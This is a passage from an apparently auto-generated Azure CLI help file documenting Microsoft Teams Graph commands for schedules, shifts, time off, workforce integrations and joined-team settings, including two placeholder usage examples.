short-summary: "Get shifts from teams."
"""
helps['teams team-schedule show-swap-shift-change-request'] = """
type: command
short-summary: "Get swapShiftsChangeRequests from teams."
"""
helps['teams team-schedule show-time-off'] = """
type: command
short-summary: "Get timesOff from teams."
"""
helps['teams team-schedule show-time-off-reason'] = """
type: command
short-summary: "Get timeOffReasons from teams."
"""
helps['teams team-schedule show-time-off-request'] = """
type: command
short-summary: "Get timeOffRequests from teams."
"""
helps['teams team-schedule update-offer-shift-request'] = """
type: command
short-summary: "Update the navigation property offerShiftRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-open-shift'] = """
type: command
short-summary: "Update the navigation property openShifts in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --draft-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
- name: --shared-open-shift
short-summary: "openShiftItem"
long-summary: |
Usage: --shared-open-shift open-slot-count=XX activities=XX display-name=XX notes=XX end-date-time=XX \
start-date-time=XX theme=XX
open-slot-count: Count of the number of slots for the given open shift.
activities: An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required.
display-name: The shift label of the shiftItem.
notes: The shift notes for the shiftItem.
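    examples:
      - name: Sketch of updating the shared details of an open shift. The --team-id and --open-shift-id options and their values are assumed placeholders; the --shared-open-shift keys follow the Usage line above.
        text: |-
               az teams team-schedule update-open-shift --team-id "{team-id}" --open-shift-id "{openShift-id}" --shared-open-shift open-slot-count=2 display-name="Evening shift" notes="Reduced coverage" start-date-time="2014-01-01T16:00:00Z" end-date-time="2014-01-02T00:00:00Z" theme="blue"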
"""
helps['teams team-schedule update-open-shift-change-request'] = """
type: command
short-summary: "Update the navigation property openShiftChangeRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-scheduling-group'] = """
type: command
short-summary: "Update the navigation property schedulingGroups in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-shift'] = """
type: command
short-summary: "Update the navigation property shifts in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --activities code=XX display-name=XX end-date-time=XX is-paid=XX start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --activities argument.
- name: --microsoft-graph-shift-item-activities
short-summary: "An incremental part of a shift which can cover details of when and where an employee is during \
their shift. For example, an assignment or a scheduled break or lunch. Required."
long-summary: |
Usage: --microsoft-graph-shift-item-activities code=XX display-name=XX end-date-time=XX is-paid=XX \
start-date-time=XX theme=XX
code: Customer defined code for the shiftActivity. Required.
display-name: The name of the shiftActivity. Required.
end-date-time: The end date and time for the shiftActivity. The Timestamp type represents date and time \
information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like \
this: '2014-01-01T00:00:00Z'. Required.
is-paid: Indicates whether the microsoft.graph.user should be paid for the activity during their shift. \
Required.
start-date-time: The start date and time for the shiftActivity. The Timestamp type represents date and \
time information using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look \
like this: '2014-01-01T00:00:00Z'. Required.
Multiple actions can be specified by using more than one --microsoft-graph-shift-item-activities argument.
"""
helps['teams team-schedule update-swap-shift-change-request'] = """
type: command
short-summary: "Update the navigation property swapShiftsChangeRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-time-off'] = """
type: command
short-summary: "Update the navigation property timesOff in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --draft-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --draft-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
- name: --shared-time-off
short-summary: "timeOffItem"
long-summary: |
Usage: --shared-time-off time-off-reason-id=XX end-date-time=XX start-date-time=XX theme=XX
time-off-reason-id: ID of the timeOffReason for this timeOffItem. Required.
"""
helps['teams team-schedule update-time-off-reason'] = """
type: command
short-summary: "Update the navigation property timeOffReasons in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-schedule update-time-off-request'] = """
type: command
short-summary: "Update the navigation property timeOffRequests in teams."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams teamwork-teamwork'] = """
type: group
short-summary: Manage teamwork teamwork with teams_v1_0
"""
helps['teams teamwork-teamwork show-teamwork'] = """
type: command
short-summary: "Get teamwork."
"""
helps['teams teamwork-teamwork update-teamwork'] = """
type: command
short-summary: "Update teamwork."
"""
helps['teams teamwork'] = """
type: group
short-summary: Manage teamwork with teams_v1_0
"""
helps['teams teamwork create-workforce-integration'] = """
type: command
short-summary: "Create new navigation property to workforceIntegrations for teamwork."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --encryption
short-summary: "workforceIntegrationEncryption"
long-summary: |
Usage: --encryption protocol=XX secret=XX
secret: Encryption shared secret.
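    examples:
      - name: Sketch of creating a workforce integration. Only the --encryption keys documented above are set; the protocol value and any other properties the service may require (for example a display name or callback URL) are assumed and omitted here.
        text: |-
               az teams teamwork create-workforce-integration --encryption protocol="sharedSecret" secret="{shared-secret}"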
"""
helps['teams teamwork delete-workforce-integration'] = """
type: command
short-summary: "Delete navigation property workforceIntegrations for teamwork."
"""
helps['teams teamwork list-workforce-integration'] = """
type: command
short-summary: "Get workforceIntegrations from teamwork."
"""
helps['teams teamwork show-workforce-integration'] = """
type: command
short-summary: "Get workforceIntegrations from teamwork."
"""
helps['teams teamwork update-workforce-integration'] = """
type: command
short-summary: "Update the navigation property workforceIntegrations in teamwork."
parameters:
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --encryption
short-summary: "workforceIntegrationEncryption"
long-summary: |
Usage: --encryption protocol=XX secret=XX
secret: Encryption shared secret.
"""
helps['teams user'] = """
type: group
short-summary: Manage user with teams_v1_0
"""
helps['teams user create-joined-team'] = """
type: command
short-summary: "Create new navigation property to joinedTeams for users."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email addresses to send notifications to for groups without owners. \
Multiple email addresses can be defined by separating them with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams user delete-joined-team'] = """
type: command
short-summary: "Delete navigation property joinedTeams for users."
"""
helps['teams user list-joined-team'] = """
type: command
short-summary: "Get joinedTeams from users."
"""
helps['teams user show-joined-team'] = """
type: command
short-summary: "Get joinedTeams from users."
"""
helps['teams user update-joined-team'] = """
type: command
short-summary: "Update the navigation property joinedTeams in users."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
